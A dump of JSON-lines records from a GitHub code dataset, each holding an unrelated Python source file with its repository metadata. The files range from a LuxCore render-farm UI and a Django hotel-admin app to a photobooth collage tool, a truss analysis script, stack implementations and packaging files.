max(1, int(self.lineEditStatsPeriod.text()))\n\t\t\tcurrentJob.SetStatsPeriod(val)\n\t\t\tlogger.info(\"Statistics period changed to: %d\" % val)\n\n\tdef clickedForceFilmMerge(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tcurrentJob.ForceFilmMerge()\n\n\tdef clickedForceFilmDownload(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tcurrentJob.ForceFilmDownload()\n\n\tdef clickedFinishJob(self):\n\t\tself.renderFarm.StopCurrentJob()\n\t\tself.__UpdateCurrentJobTab()\n\t\tself.__UpdateQueuedJobsTab()\n\n\tdef clickedRefreshNodesList(self):\n\t\tself.__RenderFarmNodesUpdateCallBack()\n\n\tdef clickedQuit(self):\n\t\tself.close()\n\n\tdef closeEvent(self, event):\n\t\t# Stop the beacon receiver\n\t\tself.beacon.Stop()\n\n\t\t# Stop the render farm\n\t\tself.renderFarm.Stop()\n\n\t\tevent.accept()\n\n\tdef event(self, event):\n\t\tif event.type() == LogEvent.EVENT_TYPE:\n\t\t\tself.textEditLog.moveCursor(QtGui.QTextCursor.End)\n\t\t\tif event.isHtml:\n\t\t\t\tself.textEditLog.insertHtml(event.msg)\n\t\t\t\tself.textEditLog.insertPlainText(\"\\n\")\n\t\t\telse:\n\t\t\t\tself.textEditLog.insertPlainText(event.msg)\n\t\t\t\t\n\t\t\t\t# Show few specific messages on the status bar\n\t\t\t\tif event.msg.startswith(\"Waiting for a new connection\") or \\\n\t\t\t\t\t\tevent.msg.startswith(\"Started\") or \\\n\t\t\t\t\t\tevent.msg.startswith(\"Waiting for configuration...\"):\n\t\t\t\t\tself.statusbar.showMessage(event.msg)\n\n\t\t\treturn True\n\t\telif event.type() == CurrentJobUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateCurrentJobTab()\n\t\telif event.type() == JobsUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateCurrentJobTab()\n\t\t\tself.__UpdateQueuedJobsTab()\n\t\telif event.type() == NodesUpdateEvent.EVENT_TYPE:\n\t\t\tself.__UpdateNodesTab()\n\n\t\t\treturn True\n\n\t\treturn QtWidgets.QWidget.event(self, event)\n\ndef ui(app):\n\ttry:\n\t\tpyluxcore.Init(loghandler.LuxCoreLogHandler)\n\n\t\tform = MainApp()\n\t\tform.show()\n\t\t\n\t\tapp.exec_()\n\tfinally:\n\t\tpyluxcore.SetLogHandler(None)\n\ndef main(argv):\n\tapp = QtWidgets.QApplication(sys.argv)\n\tui(app)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"LuxCoreRender/LuxCore","sub_path":"src/pyluxcoretools/pyluxcoretools/pyluxcorenetconsole/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":15084,"program_lang":"python","lang":"en","doc_type":"code","stars":1047,"dataset":"github-code","pt":"70"}
+{"seq_id":"32819292996","text":"import sys\nimport os.path\nfrom PIL import Image, ImageOps, ImageEnhance\nimport logging\n\n\nclass Collage:\n def __init__(self, picture_list, background_path=\"images/background.jpg\", width=6048, height=4032, margin_border=5,\n margin_bottom=8, brightness_factor=1, contrast_factor=1):\n self.background_path = background_path\n self.width = width\n self.height = height\n self._open_or_create_background_image()\n self.picture_list = picture_list\n\n self.margin_border = margin_border\n self.margin_bottom = margin_bottom\n\n # Image enhacements for brightness and contrast\n self.brightness_factor = brightness_factor\n self.contrast_factor = contrast_factor\n\n # self.ratio = width / height # aspect ratio of background picture\n self.margin_width = int(self.width * self.margin_border / 100)\n self.margin_height = int(self.height * self.margin_border / 100)\n self.margin_bottom = int(self.height * self.margin_bottom / 100)\n\n @staticmethod\n def _resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\n def _open_or_create_background_image(self):\n if self.background_path is not None:\n if os.path.isfile(self.background_path):\n self.background = Image.open(self.background_path)\n bg_width, bg_height = self.background.size\n if bg_width != self.width or bg_height != self.height:\n logging.info(f\"Provided Background size does not fit to target size. Will resize background image for you \\r\\n\"\n f\"Background size: {bg_width} x {bg_height}, target size: {self.width} x {self.height}\")\n self.background = ImageOps.fit(self.background, (self.width, self.height))\n else:\n logging.warning(f\"Could not find Background image {self.background_path}. Will create a white background for you\")\n self.background = Image.new(\"RGB\", (self.width, self.height), \"white\")\n else:\n self.background = Image.new(\"RGB\", (self.width, self.height), \"white\")\n\n def _create_collage_list(self, amount, width, height):\n \"\"\"\n Creates a list containing actual images using the picture_list with the correct width and height.\n Automatically creates a placeholder image if not enough images available in list\n :param amount: amount of files which should be in the collage list\n :param width: target width of each collage picture\n :param height: target height of each collage picture\n :return: list of images with correct width and height\n \"\"\"\n collage_list = []\n # Create a list of collage pictures with correct width and height and crop image according to margins\n for x in range(-1, (amount + 1) * -1, -1):\n try:\n img_collage = Image.open(self.picture_list[x])\n except IndexError:\n # TODO: Alpha channel seems not to work, image becomes black\n logging.warning(f\"Index error while creating collage. Maybe not enough photos until now.\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n except FileNotFoundError:\n logging.error(f\"Error: Could not find picture in picture list: {self.picture_list[x]}\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n except Exception as e:\n logging.error(f\"Unknown Error: {e}\")\n logging.info(f\"Create empty image for you\")\n img_collage = Image.new(\"RGB\", (10, 10), \"white\")\n try:\n # Apply enhancements for brightness and contrast\n enhancer_brightness = ImageEnhance.Brightness(img_collage)\n img_enhanced_brightness = enhancer_brightness.enhance(self.brightness_factor)\n enhancer_contrast = ImageEnhance.Contrast(img_enhanced_brightness)\n img_enhanced_contrast = enhancer_contrast.enhance(self.contrast_factor)\n\n # Fit image to collage size\n img_collage = ImageOps.fit(img_enhanced_contrast, (width, height))\n collage_list.append(img_collage)\n except Exception as e:\n logging.error(f\"Create fallback image due to unhandled exception: {e}\")\n img_collage = Image.new(\"RGB\", (10, 10), \"black\")\n img_collage = ImageOps.fit(img_collage, (width, height))\n collage_list.append(img_collage)\n return collage_list\n\n def create_collage_2x2(self):\n # calculate width and height of each single collage picture according to border margin and bottom margin\n collage_picture_width = int(self.width / 2 - self.margin_width - 0.5 * self.margin_width)\n collage_picture_height = int(self.height / 2 - self.margin_height\n - 0.5 * self.margin_height - self.margin_bottom * 0.5)\n\n collage_list = self._create_collage_list(4, collage_picture_width, collage_picture_height)\n\n # take background image and paste each collage image on top of it with correct margin\n self.background.paste(collage_list[0], (self.margin_width, self.margin_height)) # top left\n self.background.paste(collage_list[1], (self.width - collage_picture_width - self.margin_width, self.margin_height)) # top right\n self.background.paste(collage_list[2], (self.margin_width, self.margin_height * 2 + collage_picture_height)) # bottom left\n self.background.paste(collage_list[3], (self.margin_width * 2 + collage_picture_width, self.margin_height * 2 + collage_picture_height)) # bottom right\n\n def create_collage_1x1(self):\n # calculate width and height of each single collage picture according to border margin and bottom margin\n collage_picture_width = int(self.width - 2 * self.margin_width)\n collage_picture_height = int(self.height - 2 * self.margin_height - self.margin_bottom)\n\n collage_list = self._create_collage_list(1, collage_picture_width, collage_picture_height)\n\n # take background image and paste each collage image on top of it with correct margin\n self.background.paste(collage_list[0], (self.margin_width, self.margin_height)) # top left\n\n def show_collage(self):\n self.background.show()\n\n def save_collage(self, file_path):\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n self.background.save(file_path, quality=95)\n","repo_name":"smash14/PhotoboothDisplay","sub_path":"collage/collage.py","file_name":"collage.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"72745003746","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n## Input truss material properties\nE = 29e3 # Units: ksi\nA = 2 # Units: sq in\n\nnodes = [] # Node coordinates\nelems = [] # Element connections\n\n## Assemble nodal coordinates array (Units: ft)\nnodes.append([0, 0])\nnodes.append([10, 10])\nnodes.append([20, 10])\nnodes.append([10, 0])\n\n## Assemble element connections array\nelems.append([1, 2])\nelems.append([2, 3])\nelems.append([3, 4])\nelems.append([1, 3])\nelems.append([4, 2])\n\n\n## Format the output\nnodes = np.array(nodes).astype(float)\nelems = np.array(elems)\n\n## Convert the node coordinates from ft to in\nnodesInFt = nodes * 12\n\n\n## Assemble the global force vector - units: k\n# f1, f2, f7, & f8 are unknown support reactions\nF = np.zeros_like(nodes)\n\n\n## F[2, 0] Applied: node 2 in x-direction OR\n# F[2, 1] Applied: node 2 in y-direction\nF[2, 1] = -30 # Units: kips\n\n\n\"\"\" \n## Test the outputs thus far:\n\nprint(nodes)\nprint(\" \")\nprint(testConvert)\nprint(\" \")\nprint(elems)\nprint(\" \")\nprint(F)\n\"\"\"\n\n\n# Support displacements\nUr = [0, 0, 0, 0] # Global dof's 1, 2, 7, & 8\n\n# Note: Global dof's 3, 4, 5, & 6 are unknown, non-zero displacements\n\nDofConn = np.ones_like(nodes).astype(int)\nDofConn[0, :] = 0\n\n\n### Truss structural analysis\n\ndef TrussAnalysis():\n NN = len(nodes)\n NE = len(elems)\n DOF = 2\n NDOF = DOF * NN\n \n # Structural analysis\n d = nodes[elems[:, 1], :] - nodes[elems[:, 0], :]\n\n\n\n","repo_name":"Brlaney/python-stiffness","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20776426615","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import fields, models, _\r\n\r\nclass AccountReportGeneralLedgerExcel(models.TransientModel):\r\n _inherit = \"account.report.general.ledger\"\r\n \r\n def _print_report(self, data):\r\n if self._context.get('excel_report'):\r\n data = self.pre_print_report(data)\r\n data['form'].update(self.read(['initial_balance', 'sortby'])[0])\r\n if data['form'].get('initial_balance') and not data['form'].get('date_from'):\r\n raise UserError(_(\"You must define a Start Date\"))\r\n records = self.env[data['model']].browse(data.get('ids', []))\r\n return self.env.ref('true_mart_pos.action_report_general_ledger_excel').report_action(\r\n records, data=data, config=False)\r\n else:\r\n return super(AccountReportGeneralLedgerExcel, self)._print_report(data)","repo_name":"thuyeinaung/True_Mart","sub_path":"true_mart_pos/wizards/account_report_general_ledger_excel.py","file_name":"account_report_general_ledger_excel.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19987557299","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse, Http404 \n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.utils import timezone\n\nfrom .models import Room, RoomOrder\nfrom .formsModel import RoomForm \n\nfrom django.core import serializers\nimport json\n\nfrom django.db.models import Q\n# Create your views here.\n\n# raise Http404(\"Poll does not exist\") //404 response\n\n@login_required(login_url='/login')\ndef index(request):\n\treturn render(request, 'AppAdmin/index.html' )\n\n@login_required(login_url='/login')\ndef rooms(request):\n\tdata = Room.objects.all()\n\tcontext = {'rooms_data': data}\n\treturn render(request, 'AppAdmin/rooms.html', context)\n\n@login_required(login_url='/login')\ndef addRoom(request):\n\tif request.method == \"POST\" :\n\t\tform = RoomForm(request.POST, request.FILES)\n\t\tform.published_date = timezone.now()\n\t\tis_publish = request.POST.get('is_publish', False);\n\t\t# form.is_publish = is_publish #get_value_of_checkbox(is_publish)\n\t\tprint(\"Check: \",is_publish)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tform = RoomForm()\n\t\t\tmessages.success(request, {'msg': 'Room added successfully', 'icon':'check', 'alert_box':'success'})\n\t\telse:\n\t\t\tprint(\"Error: \",form.errors)\n\t\t\tmessages.error(request, {'msg': 'Failed to add room', 'icon':'ban', 'alert_box':'danger'})\n\telse:\n\t\tform = RoomForm()\n\n\tcontext = {'form': form}\n\treturn render(request, 'AppAdmin/add-room.html', context)\n\n@login_required(login_url='/login')\ndef editRoom(request, get_room_no):\n\tif request.method == \"POST\" :\n\t\tmessages.success(request, {'msg': 'Room added successfully ', 'icon':'check', 'alert_box':'success'})\n\telse:\n\t\tform = EditRoomForm()\n\t# \tmessages.error(request, {'msg': 'Failed to add room', 'icon':'ban', 'alert_box':'danger'})\n\trooms_data = Room.objects.all()\n\t\n\t# res = serializers.serialize( 'json' , rooms_data)\n\tcontext = {'form': form}\n\t# context = {'rooms_data': rooms_data}\n\n@login_required(login_url='/login')\ndef bookingDetails(request):\n\tdata = RoomOrder.objects.all().order_by('order_timestamp')\n\tprint(\"Data: \", data)\n\tcontext = {'rooms_orders': data}\n\treturn render(request, 'AppAdmin/booking-details.html', context)\n\n\n@login_required(login_url='/login')\ndef profile(request):\n\tcontext = {}\n\treturn render(request, 'AppAdmin/booking-details.html', context)\n\n@login_required(login_url='/login')\ndef SaveRoomDetails(request):\n\tcontext = {'status' : 'failed', 'message' : '' }\n\t\t# context.update(data= 33)\n\n\tif request.method == 'POST':\n\t\troom_no = request.POST['room_no']\n\t\troom_type = request.POST['room_type']\n\t\tprice = request.POST['price']\n\t\tdetails = request.POST['details']\n\t\tis_publish = request.POST.get('is_publish', False);\n\t\tdata = Room.objects.get(room_no=room_no)\n\t\tdata.room_type = room_type\n\t\tdata.price = price\n\t\tdata.details = details\n\t\tdata.is_publish = get_value_of_checkbox(is_publish)\n\n\t\tdata.save()\n\t\tcontext.update(status= 'success')\n\t\tcontext.update(message= ' Room updated successfully...')\n\telse:\n\t\tcontext.update(message= 'Invaild Request')\n\n\treturn JsonResponse(context)\n\n@login_required(login_url='/login')\ndef getRoomDetails(request):\n\tcontext = {}\n\tstatus = 'failed'\n\tmessage = ''\n \n\tif request.method == 'POST':\n\t\tr_no = str(request.POST['id'])\n\t\tif r_no:\n\t\t\tdata = Room.objects.get(room_no=r_no)\n\t\t\tif data:\n\t\t\t\t# context = serializers.serialize(\"json\", data)\n\t\t\t\tcontext = {\n\t\t\t\t\t'room_no':data.room_no,\n\t\t\t\t\t'room_type':data.room_type,\n\t\t\t\t\t'price': data.price,\n\t\t\t\t\t'image': 'media/'+str(data.image),\n\t\t\t\t\t'is_publish': data.is_publish,\n\t\t\t\t\t'details': str(data.details),\n\n\t\t\t\t}\n\t\t\t\tstatus = 'success'\n\t\t\t\t# return HttpResponse(context, content_type='text/json')\n\t\t\telse:\n\t\t\t\tmessage = 'No record found'\n\t\telse:\n\t\t\tmessage = 'invalid input'\n\telse:\n\t\tcontext = {'error':'method not supported'}\n\treturn JsonResponse({'status':status, 'message':message, 'data':context})\n\t\n\n@login_required(login_url='/login')\ndef dataTableAjax(request):\n\ttable_data = []\n\tpublish = ''\n\tdb_column = ['image','room_no', 'room_type', 'price', 'details', 'is_publish']\n\tget_request = request.GET\n\tget_val =request.GET\n\t\n\ttry:\n\t\tdraw = request.GET.get('draw')\n\t\tstart = int(request.GET.get('start'))\n\t\tlength = int(request.GET.get('length'))\n\t\tsearch = request.GET.get('search[value]')\n\t\torder = request.GET.get('order[0][dir]')\n\t\torder_column = request.GET.get('order[0][column]')\n\texcept Exception as e:\n\t\tstart = 0\n\t\tlength = 10\n\t\tsearch = ''\n\t\t# raise e\n\n\tfilter_val = (\n\t\tQ(room_no__contains=search) | \n\t\tQ(room_type__icontains=search) | \n\t\tQ(price__contains=search) | \n\t\tQ(details__icontains=search)\n\t)\n\n\ttry:\n\t\torder_val = db_column[int(order_column)]\n\texcept Exception as e:\n\t\torder_val = db_column[1]\n\t\t# raise e\n\n\tif order == 'desc' :\n\t\torder_val = \"-\" + str(order_val)\n\n\tall_data = Room.objects.all()\n\tif search:\n\t\tdata = Room.objects.filter(filter_val).order_by(order_val)[start : start+length]\n\t\tf_data = Room.objects.filter(filter_val)\n\t\trecordsFiltered = f_data.count()\n\telse:\n\t\tdata = Room.objects.filter(filter_val).order_by(order_val)[start : start+length]\n\t\trecordsFiltered = all_data.count()\n\n\trecordsTotal = all_data.count()\n\n\tfor x in data:\n\t\tif x.is_publish == True:\n\t\t\tpublish = ' '\n\t\telse:\n\t\t\tpublish = ' '\n\n\t\tsingle_data = [\n\t\t\t' ',\n\t\t\tx.room_no,\n\t\t\tx.room_type,\n\t\t\tx.price,\n\t\t\tx.details,\n\t\t\tpublish,\n\t\t\t'Edit Delete ' \n\t\t]\n\t\ttable_data.append(single_data)\n\n\tcontext = {\n\t\t\"draw\" : draw,\n\t\t\"recordsTotal\" : recordsTotal,\n\t\t\"recordsFiltered\" : recordsFiltered,\n\t\t\"data\" : table_data\n\t}\n\treturn JsonResponse(context)\n\n\ndef get_value_of_checkbox(value):\n\tif value:\n\t\tvalue_s = 'True'\n\telse:\n\t\tvalue_s = 'False'\n\treturn value_s","repo_name":"pranavmundre/Django-Hotel-Management","sub_path":"AppAdmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13292157976","text":"\n\n#Node\nclass Node(object):\n def __init__(self, value, next):\n self.value = value\n self.next = next\n\n# implement a stack in Python\n# works fine.\nclass Stack(object):\n def __init__(self):\n self.top = Node(0, None)\n self.n = 0\n\n def push(self, value):\n if self.top == None:\n self.top = Node(value, None)\n\n else:\n oldTop = self.top\n self.top = Node(value, oldTop)\n\n self.n +=1 # Syntax: python does not support unary operators like ++ and --\n\n def pop(self):\n item = None\n if self.top == None:\n raise Exception (\"No elements remaining to pop!\")\n else:\n item = self.top.value\n self.top = self.top.next\n\n self.n -=1\n return item\n\n def isEmpty(self):\n return self.n == 0\n\n def size(self):\n return self.n\n\n# ResizingStack in Python\nclass ResizingStack(object):\n def __init__(self):\n self.n = 0\n self.a = [None]# Syntax:1 element empty list\n\n def peek(self):\n \"the next item to be popped\"\n temp = self.n - 1\n return self.a[temp]\n\n def pop(self):\n if self.n < len(self.a)/4:\n self.resize(int(len(self.a)/2))\n\n self.n -= 1\n item = self.a[self.n]\n print (item, \" \")\n return item\n\n def push(self, i):\n if self.n == len(self.a):\n self.resize(2 *self.n)\n self.a[self.n] = i\n self.n +=1\n\n\n def resize(self, size):\n # min = self.n > size if size else self.n# Syntax: ternary operator\n t = [None]*size #empty list of size \"size\"\n for i in range(self.n) :# for loop\n t[i] = self.a[i]\n\n self.a = t\n\n def size(self):\n return self.n\n\n def isEmpty(self):\n return self.n == 0\n\n\ns = Stack()\nassert s.isEmpty() ,\"Should be empty because elements added\"\n\ns.push(13)\nassert s.size() == 1, \"Size should be 1 because one element was added\"\n\ns.push(23)\nassert s.size() == 2, \"\"\n\ns.push(55)\nassert s.size() == 3, \"\"\n\nassert 55 == s.pop()\nassert s.size() == 2, \"\"\n\ns.push(34)\nassert s.size() == 3, \"\"\n\nassert 34 == s.pop()\nassert s.size() == 2, \"\"\n\n# ResizingStack\ns = ResizingStack()\nassert s.isEmpty() ,\"Should be empty because elements added\"\n\ns.push(13)\nassert s.size() == 1, \"Size should be 1 because one element was added\"\nprint(s.peek())\ns.push(23)\nassert s.size() == 2, \"\"\nprint(s.peek())\ns.push(55)\nassert s.size() == 3, \"\"\nprint(s.peek())\nassert 55 == s.pop()\nassert s.size() == 2, \"\"\n\ns.push(34)\nassert s.size() == 3, \"\"\n\nassert 34 == s.pop()\nassert s.size() == 2, \"\"\n\n","repo_name":"SohamGhormade/Python","sub_path":"my_env/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71820259427","text":"from util import check\n\nclass Solution:\n def findLength(self, A, B) -> int:\n arr_sub=[0 for i in range(len(A)+1)]\n arr=[arr_sub.copy() for j in range(len(B)+1)]\n max=0\n for i in range(1,len(A)+1):\n for j in range(1,len(B)+1):\n if A[i-1]==B[j-1]:\n arr[i][j]=arr[i-1][j-1]+1\n if arr[i][j]>max:\n max=arr[i][j]\n return max\n\n\nsol=Solution()\ncheck([[1,2,3,2,1],[3,2,1,4,7] ],[3], sol.findLength)\n","repo_name":"arushkharbanda/coding_pract","sub_path":"python/longest_common_Substring.py","file_name":"longest_common_Substring.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70784874786","text":"import pymongo\nfrom ..conf.settings import conf_obj\n\n\ndef retrieve_financial_data(symbol):\n host = conf_obj.get(\"db_credentials\", \"host\")\n port = conf_obj.get(\"db_credentials\", \"port\")\n db_name = conf_obj.get(\"db_credentials\", \"db_name\")\n mongo_uri = \"mongodb://{host}:{port}/{db_name}\".\\\n format(host=host, port=port, db_name=db_name)\n client = pymongo.MongoClient(mongo_uri)\n db = client.get_default_database()\n return db[symbol].find().sort([(\"date\", pymongo.DESCENDING)])\n","repo_name":"blasrodri/bloomb","sub_path":"bloomb/data_management/database_retriever.py","file_name":"database_retriever.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"10337739050","text":"# The TMPDIR environment variable will override the default above but not the one that\n# might be defined in localConstants.py.\nimport os\nimport sys\n\nstarDirTmp = os.path.join(\"/tmp\", \"watttos\")\n\ntry:\n from localConstants import wattosDirTmp #@UnresolvedImport\nexcept:\n if os.environ.has_key(\"TMPDIR\"):\n wattosDirTmp = os.path.join(os.environ[\"TMPDIR\"], \"watttos\")\n else:\n wattosDirTmp = starDirTmp\n # end if\n# end try\n\nif not os.path.exists(wattosDirTmp):\n# print(\"DEBUG: Creating a temporary dir for wattos: [%s]\" % wattosDirTmp)\n if os.mkdir(wattosDirTmp):\n print(\"ERROR: Failed to create a temporary dir for wattos at: \" + wattosDirTmp)\n sys.exit(1)\n#print 'DEBUG: using wattosDirTmp: ' + wattosDirTmp\n","repo_name":"jurgenfd/wattos","sub_path":"python/Wattos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4253679970","text":"# fifaAnalysis.py\r\n# @coneill 01/03/2023\r\n# Data Analysis Steps:\r\n# 1. Access, 2. Pre-process, \r\n# 3. Analyse, 4. Visualise\r\n\r\n# 1. Access\r\nfrom pandas import *\r\ndataIn = read_csv(\"FIFA21-player-list.csv\")\r\n#print(dataIn)\r\n\r\nageList = dataIn[\"age\"].tolist()\r\nprint(ageList)\r\n\r\n# 2. Pre-process data\r\n# No cleaning needed - all ages are valid\r\n\r\n# 3. Analyse data\r\nimport statistics\r\nprint(\"Mean age: \",statistics.mean(ageList))\r\nprint(\"Modal age: \",statistics.mode(ageList))\r\nprint(\"Median age: \",statistics.median(ageList))\r\nprint(\"Range of ages: \",statistics.variance(ageList))\r\n\r\n# 4. Visualise Data\r\nimport matplotlib.pyplot as plt\r\nageList.sort()\r\nplt.plot(ageList)\r\nplt.show()\r\n\r\n","repo_name":"conacc/LCCSPythonFiles","sub_path":"8. Analytics/fifaAnalysis.py","file_name":"fifaAnalysis.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"36163522596","text":"# Activity 12.2: Task 2\r\n#File: ACT_12_Fibbonacci.py\r\n#Date:\t\t18 Oct 2018\r\n#By: \t\tAlex Tillman\r\n#\t\t\tJustin Kohler\r\n#\t\t\tRyan Steffan \r\n#\t\t\tDavid McCoy\r\n#\r\n#Section:\t021\r\n#Team \t\t256\r\n#\r\n#Electronic Signature\r\n#\tAlex Tillman\r\n#\r\n#\r\n#\r\n#This electronic signature above indiccates the script\r\n#submitted for evaluation is my individual work, and i \r\n#ahve a general understanding of all aspects of its \r\n#development and execution\r\n#\r\n#A BRIEF DESCRIPTION OF WHAT THE SCRIPT OR FUNCTION DOES\r\n#This take the factorial of a number n \r\n\r\ndef myFib(n):\r\n\tinitial = 0\r\n\tif n < 0 or n%1 !=0 :\r\n\t\tprint(\"Invalid entry- number must be non-negative integer\")\r\n\telse\t:\r\n\t\tfibList = [0]\r\n\t\tdigit1 = initial # 0\r\n\t\tdigit2 = 1\r\n\t\tfor num in range(initial,n-1): #0 to 13\r\n\t\t\tdigit1,digit2 = digit2,digit1+digit2\r\n\t\t\tfibList.append(digit1) # 0 + 1 \r\n\t\t\tprint (fibList)\r\n","repo_name":"atillman4/python","sub_path":"fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43213937192","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom travelport.models.vehicle_upsell_offer import VehicleUpsellOffer\nfrom travelport.models.vehicle_upsell_qualify import VehicleUpsellQualify\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/util_v52_0\"\n\n\n@dataclass\nclass VehicleUpsellAdd:\n \"\"\"\n Add command for adding VehicleUpsellQualify,VehicleUpsellOffer.\n \"\"\"\n class Meta:\n namespace = \"http://www.travelport.com/schema/util_v52_0\"\n\n vehicle_upsell_qualify: None | VehicleUpsellQualify = field(\n default=None,\n metadata={\n \"name\": \"VehicleUpsellQualify\",\n \"type\": \"Element\",\n \"required\": True,\n }\n )\n vehicle_upsell_offer: None | VehicleUpsellOffer = field(\n default=None,\n metadata={\n \"name\": \"VehicleUpsellOffer\",\n \"type\": \"Element\",\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"travelport/models/vehicle_upsell_add.py","file_name":"vehicle_upsell_add.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"8155296316","text":"#!/usr/bin/env python\n\"\"\"\nPackaging for the Memory Layout Diagrams.\n\"\"\"\n\nfrom distutils.core import setup\nimport setuptools # noqa\n\nfrom os import path\n# io.open is needed for projects that support Python 2.7\n# It ensures open() defaults to text mode with universal newlines,\n# and accepts an argument to specify the text encoding\n# Python 3 only projects can skip this import\nfrom io import open\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name = 'memory_layout',\n packages = ['memory_layout', 'memory_layout.renderers'],\n version = '0.0.1',\n license='MIT',\n description = 'Generating diagrams to show memory map layouts from code or definition files',\n long_description = long_description,\n long_description_content_type = 'text/markdown',\n author = 'Charles Ferguson',\n author_email = 'gerph@gerph.org',\n url = 'https://github.com/gerph/memory-layout-diagram',\n keywords = ['diagram', 'generator', 'memory-map'],\n install_requires= [\n ],\n classifiers= [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n \"Operating System :: OS Independent\"\n ],\n python_requires='>=2.7',\n entry_points=\"\"\"\n [console_scripts]\n mld = memory_layout.__main__:main\n\"\"\",\n)\n","repo_name":"gerph/memory-layout-diagram","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"70"}
+{"seq_id":"5808952045","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPYABSORP\n========\n\nAuthor:\n Michael Markus Ackermann - dev.toktom@outlook.com\nPyAbsorp:\n This is a package developed to be use to find the Sound Absorption\n Coefficient through some implemented models, like Biot-Allard,\n Johnson-Champoux and others.\n In order to provide such functionalities we require a few packages\n to be installed:\n - Numpy\n - Scipy\n\n You can find out everything available reading the submodules documentation\n\n\nFor further information, check the specific module, class, method or function\ndocumentation.\n\"\"\"\n\nfrom pyabsorp.absorption import absorption_coefficient\nfrom pyabsorp.version import __author__, __date__, __version__\nfrom pyabsorp.models import delany_bazley, rayleigh, biot_allard, johnson_champoux\nfrom pyabsorp.material import Material\nfrom pyabsorp.air import air_properties, air_impedance, air_density, \\\n specific_heat_constant_pressure, specific_heat_constant_volume,\\\n specific_heat_ratio, sound_speed, ceilsius_to_kelvin, pierce, \\\n prandtl, viscosity, Air\nfrom pyabsorp.utils import load_object_with_pickle, save_object_with_pickle\n\n# Just to prevent \"unused\" warnings.\nassert __author__ and __date__ and __version__\n\n# package submodules and scripts to be called as pyabsorp.something\n__all__ = [\n # Functions\n 'absorption_coefficient',\n 'delany_bazley',\n 'rayleigh',\n 'biot_allard',\n 'johnson_champoux',\n 'air_properties',\n 'air_impedance',\n 'air_density',\n 'specific_heat_constant_pressure',\n 'specific_heat_constant_volume',\n 'specific_heat_ratio',\n 'sound_speed',\n 'ceilsius_to_kelvin',\n 'pierce',\n 'prandtl',\n 'viscosity',\n 'load_object_with_pickle',\n 'save_object_with_pickle',\n # Classes\n 'Material',\n 'Air']\n","repo_name":"Toktom/PyAbsorp","sub_path":"pyabsorp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
